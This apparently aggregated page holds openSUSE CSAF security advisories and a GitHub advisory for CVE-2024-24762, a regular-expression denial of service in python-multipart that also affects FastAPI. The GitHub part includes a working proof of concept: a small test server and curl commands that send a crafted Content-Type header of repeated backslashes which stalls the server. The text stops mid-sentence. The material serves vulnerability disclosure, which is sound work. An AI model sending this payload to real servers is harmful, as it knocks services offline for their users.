          "name": "python312-python-multipart-0.0.7-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.x86_64"
        },
        "product_reference": "python312-python-multipart-0.0.7-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-python-multipart-0.0.7-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.aarch64"
        },
        "product_reference": "python39-python-multipart-0.0.7-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-python-multipart-0.0.7-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.ppc64le"
        },
        "product_reference": "python39-python-multipart-0.0.7-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-python-multipart-0.0.7-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.s390x"
        },
        "product_reference": "python39-python-multipart-0.0.7-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-python-multipart-0.0.7-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.x86_64"
        },
        "product_reference": "python39-python-multipart-0.0.7-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-24762",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-24762"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.aarch64",
          "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.ppc64le",
          "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.s390x",
          "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.x86_64",
          "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.aarch64",
          "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.s390x",
          "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.x86_64",
          "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.aarch64",
          "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.s390x",
          "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.x86_64",
          "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.aarch64",
          "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.ppc64le",
          "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.s390x",
          "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-24762",
          "url": "https://www.suse.com/security/cve/CVE-2024-24762"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1219603 for CVE-2024-24762",
          "url": "https://bugzilla.suse.com/1219603"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.x86_64",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.aarch64",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.ppc64le",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.s390x",
            "openSUSE Tumbleweed:python39-python-multipart-0.0.7-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-06-15T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-24762"
    }
  ]
}

opensuse-su-2024:13684-1

Vulnerability from csaf_opensuse

Published

2024-06-15 00:00

Modified

2024-06-15 00:00

Summary

python310-fastapi-0.109.1-1.1 on GA media

Notes

Title of the patch

python310-fastapi-0.109.1-1.1 on GA media

Description of the patch

These are all security issues fixed in the python310-fastapi-0.109.1-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2024-13684

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python310-fastapi-0.109.1-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python310-fastapi-0.109.1-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-13684",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13684-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-24762 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-24762/"
      }
    ],
    "title": "python310-fastapi-0.109.1-1.1 on GA media",
    "tracking": {
      "current_release_date": "2024-06-15T00:00:00Z",
      "generator": {
        "date": "2024-06-15T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:13684-1",
      "initial_release_date": "2024-06-15T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-06-15T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-fastapi-0.109.1-1.1.aarch64",
                "product": {
                  "name": "python310-fastapi-0.109.1-1.1.aarch64",
                  "product_id": "python310-fastapi-0.109.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-fastapi-0.109.1-1.1.aarch64",
                "product": {
                  "name": "python311-fastapi-0.109.1-1.1.aarch64",
                  "product_id": "python311-fastapi-0.109.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-fastapi-0.109.1-1.1.aarch64",
                "product": {
                  "name": "python312-fastapi-0.109.1-1.1.aarch64",
                  "product_id": "python312-fastapi-0.109.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-fastapi-0.109.1-1.1.aarch64",
                "product": {
                  "name": "python39-fastapi-0.109.1-1.1.aarch64",
                  "product_id": "python39-fastapi-0.109.1-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-fastapi-0.109.1-1.1.ppc64le",
                "product": {
                  "name": "python310-fastapi-0.109.1-1.1.ppc64le",
                  "product_id": "python310-fastapi-0.109.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-fastapi-0.109.1-1.1.ppc64le",
                "product": {
                  "name": "python311-fastapi-0.109.1-1.1.ppc64le",
                  "product_id": "python311-fastapi-0.109.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-fastapi-0.109.1-1.1.ppc64le",
                "product": {
                  "name": "python312-fastapi-0.109.1-1.1.ppc64le",
                  "product_id": "python312-fastapi-0.109.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python39-fastapi-0.109.1-1.1.ppc64le",
                "product": {
                  "name": "python39-fastapi-0.109.1-1.1.ppc64le",
                  "product_id": "python39-fastapi-0.109.1-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-fastapi-0.109.1-1.1.s390x",
                "product": {
                  "name": "python310-fastapi-0.109.1-1.1.s390x",
                  "product_id": "python310-fastapi-0.109.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-fastapi-0.109.1-1.1.s390x",
                "product": {
                  "name": "python311-fastapi-0.109.1-1.1.s390x",
                  "product_id": "python311-fastapi-0.109.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-fastapi-0.109.1-1.1.s390x",
                "product": {
                  "name": "python312-fastapi-0.109.1-1.1.s390x",
                  "product_id": "python312-fastapi-0.109.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python39-fastapi-0.109.1-1.1.s390x",
                "product": {
                  "name": "python39-fastapi-0.109.1-1.1.s390x",
                  "product_id": "python39-fastapi-0.109.1-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-fastapi-0.109.1-1.1.x86_64",
                "product": {
                  "name": "python310-fastapi-0.109.1-1.1.x86_64",
                  "product_id": "python310-fastapi-0.109.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-fastapi-0.109.1-1.1.x86_64",
                "product": {
                  "name": "python311-fastapi-0.109.1-1.1.x86_64",
                  "product_id": "python311-fastapi-0.109.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-fastapi-0.109.1-1.1.x86_64",
                "product": {
                  "name": "python312-fastapi-0.109.1-1.1.x86_64",
                  "product_id": "python312-fastapi-0.109.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-fastapi-0.109.1-1.1.x86_64",
                "product": {
                  "name": "python39-fastapi-0.109.1-1.1.x86_64",
                  "product_id": "python39-fastapi-0.109.1-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-fastapi-0.109.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.aarch64"
        },
        "product_reference": "python310-fastapi-0.109.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-fastapi-0.109.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.ppc64le"
        },
        "product_reference": "python310-fastapi-0.109.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-fastapi-0.109.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.s390x"
        },
        "product_reference": "python310-fastapi-0.109.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-fastapi-0.109.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.x86_64"
        },
        "product_reference": "python310-fastapi-0.109.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-fastapi-0.109.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.aarch64"
        },
        "product_reference": "python311-fastapi-0.109.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-fastapi-0.109.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.ppc64le"
        },
        "product_reference": "python311-fastapi-0.109.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-fastapi-0.109.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.s390x"
        },
        "product_reference": "python311-fastapi-0.109.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-fastapi-0.109.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.x86_64"
        },
        "product_reference": "python311-fastapi-0.109.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-fastapi-0.109.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.aarch64"
        },
        "product_reference": "python312-fastapi-0.109.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-fastapi-0.109.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.ppc64le"
        },
        "product_reference": "python312-fastapi-0.109.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-fastapi-0.109.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.s390x"
        },
        "product_reference": "python312-fastapi-0.109.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-fastapi-0.109.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.x86_64"
        },
        "product_reference": "python312-fastapi-0.109.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-fastapi-0.109.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.aarch64"
        },
        "product_reference": "python39-fastapi-0.109.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-fastapi-0.109.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.ppc64le"
        },
        "product_reference": "python39-fastapi-0.109.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-fastapi-0.109.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.s390x"
        },
        "product_reference": "python39-fastapi-0.109.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python39-fastapi-0.109.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.x86_64"
        },
        "product_reference": "python39-fastapi-0.109.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-24762",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-24762"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.aarch64",
          "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.s390x",
          "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.x86_64",
          "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.aarch64",
          "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.s390x",
          "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.x86_64",
          "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.aarch64",
          "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.s390x",
          "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.x86_64",
          "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.aarch64",
          "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.s390x",
          "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-24762",
          "url": "https://www.suse.com/security/cve/CVE-2024-24762"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1219603 for CVE-2024-24762",
          "url": "https://bugzilla.suse.com/1219603"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python310-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python311-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python312-fastapi-0.109.1-1.1.x86_64",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.aarch64",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.s390x",
            "openSUSE Tumbleweed:python39-fastapi-0.109.1-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-06-15T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-24762"
    }
  ]
}

ghsa-2jv5-9r88-3w3p

Vulnerability from github

Published

2024-02-12 17:28

Modified

2024-09-24 15:58

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

python-multipart vulnerable to Content-Type Header ReDoS

Details

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:

```Python

main.py

from wsgiref.simple_server import make_server from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response): _, _ = parse_options_header(environ["CONTENT_TYPE"])

start_response("200 OK", [("Content-type", "text/plain")])
return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app)) print("Serving on port 8123...") httpd.serve_forever() ```

Then send the attacking request with:

console $ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

This is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.

Original Report

This was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI Hey Tiangolo! My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON). Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code: ```Python from typing import Annotated from fastapi.responses import HTMLResponse from fastapi import FastAPI,Form from pydantic import BaseModel class Item(BaseModel): username: str app = FastAPI() @app.get("/", response_class=HTMLResponse) async def index(): return HTMLResponse("Test", status_code=200) @app.post("/submit/") async def submit(username: Annotated[str, Form()]): return {"username": username} @app.post("/submit_json/") async def submit_json(item: Item): return {"username": item.username} ``` I'm running the above with uvicorn with the following command: ```console uvicorn server:app ``` Then run the following cUrl command: ``` curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/' ``` You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100% You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server. If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data. Cheers #### Impact An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data. #### Occurrences [params.py 